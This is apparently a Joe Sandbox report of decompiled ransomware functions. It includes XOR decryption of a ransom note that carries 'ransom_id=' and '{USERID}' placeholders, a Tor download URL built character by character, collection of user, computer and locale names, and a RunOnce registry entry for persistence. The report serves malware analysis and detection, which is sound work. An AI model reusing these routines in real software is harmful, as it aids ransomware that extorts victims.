lstrcatW.KERNEL32 ref: 0FBB7266
lstrcatW.KERNEL32 ref: 0FBB726E
lstrcatW.KERNEL32 ref: 0FBB7274
lstrcatW.KERNEL32 ref: 0FBB727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FBB4869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB727F

Strings

%x%x, xrefs: 0FBB7210
undefined, xrefs: 0FBB7221

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 4024856bf4fcca77e2d5ac1e87650e6f8b2dfd96213b9a6f93152447159d423a
Instruction ID: 444e531b73365f6fad913aced759180256794b7bc7a375e4c81ffed718622eeb
Opcode Fuzzy Hash: 4024856bf4fcca77e2d5ac1e87650e6f8b2dfd96213b9a6f93152447159d423a
Instruction Fuzzy Hash: CC512135146698B6CB273FA59C49FFF3A19EFC6701F020098F9101406A8BE99252DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB42B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FBB42B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfbc2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FBB3BC0( &_v148);
				E0FBB7490( &_v236, __edx); // executed
				_t97 = E0FBB72A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FBB70A0( &_v152, _t98); // executed
				_t60 = E0FBB81F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfbc0510]");
				_t77 = 0xfbc2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfbc2000) =  *(_t62 + 0xfbc2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfbc2a64 = 0xfbc2000;
				_t94 = E0FBB81F0(0xfbc2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfbc2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xfbc2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0FBB7D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfbc2000;
					_t69 =  *0xfbc2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfbc2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0fbb42c5
0x0fbb4598
0x0fbb459d
0x0fbb459d
0x0fbb42cb
0x0fbb42cc
0x0fbb42ce
0x0fbb42cf
0x0fbb42d4
0x0fbb42d6
0x0fbb42d7
0x0fbb42d9
0x0fbb42da
0x0fbb42dc
0x0fbb42dd
0x0fbb42df
0x0fbb42e0
0x0fbb42e5
0x0fbb42e7
0x0fbb42e8
0x0fbb42f1
0x0fbb42fd
0x0fbb430e
0x0fbb4317
0x0fbb4321
0x0fbb4327
0x0fbb4330
0x0fbb4341
0x0fbb433d
0x0fbb433d
0x0fbb433d
0x0fbb434b
0x0fbb4357
0x0fbb4363
0x0fbb4369
0x0fbb4371
0x0fbb4376
0x0fbb437b
0x0fbb437e
0x0fbb4383
0x0fbb4390
0x0fbb4390
0x0fbb4390
0x0fbb4393
0x0fbb4398
0x0fbb439c
0x0fbb43a1
0x0fbb43a1
0x0fbb43b0
0x0fbb43b0
0x0fbb43b7
0x0fbb43b8
0x0fbb43c4
0x0fbb43d8
0x0fbb43dc
0x0fbb4456
0x0fbb445d
0x0fbb4465
0x0fbb446d
0x0fbb4475
0x0fbb447d
0x0fbb4485
0x0fbb448d
0x0fbb4495
0x0fbb449d
0x0fbb44a5
0x0fbb44ad
0x0fbb44b5
0x0fbb44bd
0x0fbb44c5
0x0fbb44cd
0x0fbb44d5
0x0fbb44dd
0x0fbb44e5
0x0fbb44ed
0x0fbb44f5
0x0fbb44fd
0x0fbb4505
0x0fbb450d
0x0fbb4515
0x0fbb451d
0x0fbb4525
0x0fbb452d
0x0fbb4535
0x0fbb453d
0x0fbb4545
0x0fbb4555
0x0fbb455b
0x0fbb4562
0x0fbb456f
0x0fbb4575
0x0fbb4562
0x0fbb4586
0x0fbb4593
0x00000000
0x0fbb4593
0x0fbb43e0
0x0fbb43e0
0x0fbb43e2
0x0fbb43f4
0x0fbb43f8
0x0fbb43fd
0x0fbb4406
0x00000000
0x00000000
0x0fbb440a
0x0fbb440d
0x0fbb4413
0x0fbb4413
0x0fbb441b
0x00000000
0x00000000
0x0fbb4420
0x0fbb4420
0x0fbb4426
0x00000000
0x00000000
0x0fbb4430
0x0fbb4432
0x0fbb443d
0x0fbb4441
0x00000000
0x00000000
0x00000000
0x0fbb4441
0x0fbb4434
0x0fbb443b
0x00000000
0x00000000
0x00000000
0x0fbb443b
0x0fbb459e
0x00000000
0x0fbb4447
0x0fbb4447
0x0fbb4447
0x0fbb444b
0x0fbb444e
0x0fbb4451
0x00000000
0x0fbb4413
0x00000000

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32 ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNEL32(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4363
lstrcpyW.KERNEL32 ref: 0FBB43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB43E9

Strings

., xrefs: 0FBB4535
-, xrefs: 0FBB450D
t, xrefs: 0FBB448D
h, xrefs: 0FBB4525
w, xrefs: 0FBB44F5
a, xrefs: 0FBB4505
s, xrefs: 0FBB446D
{USERID}, xrefs: 0FBB43BF, 0FBB440D, 0FBB4413
c, xrefs: 0FBB44AD
/, xrefs: 0FBB44C5
., xrefs: 0FBB44B5
/, xrefs: 0FBB4475
m, xrefs: 0FBB452D
l, xrefs: 0FBB44FD
w, xrefs: 0FBB447D
w, xrefs: 0FBB4485
t, xrefs: 0FBB4465
d, xrefs: 0FBB44ED
o, xrefs: 0FBB44CD
n, xrefs: 0FBB453D
n, xrefs: 0FBB44D5
r, xrefs: 0FBB44BD
d, xrefs: 0FBB44E5
r, xrefs: 0FBB4495
y, xrefs: 0FBB451D
a, xrefs: 0FBB4515
j, xrefs: 0FBB44A5
o, xrefs: 0FBB44DD
r, xrefs: 0FBB449D
h, xrefs: 0FBB445D
ransom_id=, xrefs: 0FBB4350, 0FBB435C

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 27f88d6009cab421cfdd7a6bdc0c4f8536d5bdc4b924c484bd33a80f11d2d837
Instruction ID: 7919872ce358788d209845d68867fbf968fa35fae1ebb9b86a7510e9241b09a4
Opcode Fuzzy Hash: 27f88d6009cab421cfdd7a6bdc0c4f8536d5bdc4b924c484bd33a80f11d2d837
Instruction Fuzzy Hash: 2971FB70504340DBE720DF14E8197BB7BE1FB80748F50495CEA881B292EBF99949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB43A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB43A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfbc2000) =  *(_t41 + 0xfbc2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfbc2a64 = 0xfbc2000;
				_t60 = E0FBB81F0(0xfbc2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfbc2000;
						_t49 =  *0xfbc2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfbc2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfbc2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xfbc2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0FBB7D70( &_a136);
				return _t44;
			}

0x0fbb43a6
0x0fbb43b0
0x0fbb43b0
0x0fbb43b7
0x0fbb43b8
0x0fbb43c4
0x0fbb43d8
0x0fbb43dc
0x0fbb43e0
0x0fbb43e0
0x0fbb43e2
0x0fbb43f4
0x0fbb43f8
0x0fbb43fd
0x0fbb4406
0x00000000
0x00000000
0x0fbb440a
0x0fbb440d
0x0fbb4413
0x0fbb4413
0x0fbb441b
0x00000000
0x0fbb4420
0x0fbb4420
0x0fbb4420
0x0fbb4426
0x00000000
0x00000000
0x0fbb4430
0x0fbb4432
0x0fbb443d
0x0fbb4441
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb4434
0x0fbb4434
0x0fbb443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb443b
0x00000000
0x0fbb4432
0x0fbb459e
0x00000000
0x0fbb459e
0x00000000
0x0fbb4447
0x0fbb4447
0x0fbb4447
0x0fbb444b
0x0fbb444e
0x0fbb4451
0x00000000
0x0fbb4413
0x0fbb43e0
0x0fbb4456
0x0fbb445d
0x0fbb4465
0x0fbb446d
0x0fbb4475
0x0fbb447d
0x0fbb4485
0x0fbb448d
0x0fbb4495
0x0fbb449d
0x0fbb44a5
0x0fbb44ad
0x0fbb44b5
0x0fbb44bd
0x0fbb44c5
0x0fbb44cd
0x0fbb44d5
0x0fbb44dd
0x0fbb44e5
0x0fbb44ed
0x0fbb44f5
0x0fbb44fd
0x0fbb4505
0x0fbb450d
0x0fbb4515
0x0fbb451d
0x0fbb4525
0x0fbb452d
0x0fbb4535
0x0fbb453d
0x0fbb4545
0x0fbb4555
0x0fbb455b
0x0fbb4562
0x0fbb456f
0x0fbb4575
0x0fbb4562
0x0fbb4586
0x0fbb4593
0x0fbb459d

APIs

lstrcpyW.KERNEL32 ref: 0FBB43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB43E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBB4555
wsprintfW.USER32 ref: 0FBB456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0FBB4586

Strings

., xrefs: 0FBB4535
-, xrefs: 0FBB450D
t, xrefs: 0FBB448D
h, xrefs: 0FBB4525
w, xrefs: 0FBB44F5
a, xrefs: 0FBB4505
s, xrefs: 0FBB446D
{USERID}, xrefs: 0FBB43BF, 0FBB440D, 0FBB4413
c, xrefs: 0FBB44AD
/, xrefs: 0FBB44C5
., xrefs: 0FBB44B5
/, xrefs: 0FBB4475
m, xrefs: 0FBB452D
l, xrefs: 0FBB44FD
w, xrefs: 0FBB447D
w, xrefs: 0FBB4485
t, xrefs: 0FBB4465
o, xrefs: 0FBB44CD
d, xrefs: 0FBB44ED
n, xrefs: 0FBB453D
n, xrefs: 0FBB44D5
r, xrefs: 0FBB44BD
d, xrefs: 0FBB44E5
r, xrefs: 0FBB4495
y, xrefs: 0FBB451D
j, xrefs: 0FBB44A5
a, xrefs: 0FBB4515
o, xrefs: 0FBB44DD
r, xrefs: 0FBB449D
h, xrefs: 0FBB445D

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 3e2d6cb91dabadf1d776439bd9073a1d7b62a1e16c45b04ddbac12bbcb038c88
Instruction ID: 4d29933f6cad487dcde5f5ae37d28c719f6bf5dd61d583c269b3486a5a6ccff7
Opcode Fuzzy Hash: 3e2d6cb91dabadf1d776439bd9073a1d7b62a1e16c45b04ddbac12bbcb038c88
Instruction Fuzzy Hash: 53417D70508340CBD720DF15E4583BABFE2FB81759F44495CE6880B292DBFA8599CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0FBB2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FBB82B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0fbb296b
0x0fbb296d
0x0fbb2979
0x0fbb2980
0x0fbb2984
0x0fbb298c
0x0fbb2993
0x0fbb299a
0x0fbb29a8
0x0fbb29b0
0x0fbb29bd
0x0fbb29c7
0x0fbb29ce
0x0fbb29eb
0x0fbb29f8
0x0fbb29ff
0x0fbb2a06
0x0fbb2a0d
0x0fbb2a14
0x0fbb2a1b
0x0fbb2a22
0x0fbb2a29
0x0fbb2a30
0x0fbb2a37
0x0fbb2a3e
0x0fbb2a45
0x0fbb2a4c
0x0fbb2a53
0x0fbb2a5a
0x0fbb2a61
0x0fbb2a68
0x0fbb2a6f
0x0fbb2a76
0x0fbb2a7d
0x0fbb2a84
0x0fbb2a8c
0x0fbb2ac7
0x0fbb2a8e
0x0fbb2aa4
0x0fbb2aaf
0x0fbb2ab1
0x0fbb2ab7
0x0fbb2abf
0x0fbb2abf

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0FBB299D

Part of subcall function 0FBB82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
Part of subcall function 0FBB82B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB82FB
Part of subcall function 0FBB82B0: GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
Part of subcall function 0FBB82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
Part of subcall function 0FBB82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
Part of subcall function 0FBB82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
Part of subcall function 0FBB82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FBB2C45,00000000), ref: 0FBB2A84
lstrlenW.KERNEL32(00000000), ref: 0FBB2A8F
RegSetValueExW.KERNEL32(0FBB2C45,00520050,00000000,00000001,00000000,00000000), ref: 0FBB2AA4
RegCloseKey.KERNEL32(0FBB2C45), ref: 0FBB2AB1

Strings

S, xrefs: 0FBB29B0
e, xrefs: 0FBB2A7D
w, xrefs: 0FBB2A29
\, xrefs: 0FBB2A30
A, xrefs: 0FBB298C
n, xrefs: 0FBB2A76
u, xrefs: 0FBB2A37
H, xrefs: 0FBB2993
r, xrefs: 0FBB2A53
F, xrefs: 0FBB29BD
n, xrefs: 0FBB2A45
n, xrefs: 0FBB2A6F
P, xrefs: 0FBB296D
\, xrefs: 0FBB2A14
r, xrefs: 0FBB2A3E
\, xrefs: 0FBB29EB
r, xrefs: 0FBB29FF
W, xrefs: 0FBB29C7
d, xrefs: 0FBB2A22
R, xrefs: 0FBB2A68
s, xrefs: 0FBB2A06
V, xrefs: 0FBB2A4C
n, xrefs: 0FBB2A61
i, xrefs: 0FBB2A5A
i, xrefs: 0FBB2A1B
I, xrefs: 0FBB2979
R, xrefs: 0FBB29CE
i, xrefs: 0FBB29F8
f, xrefs: 0FBB2A0D
U, xrefs: 0FBB2984

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
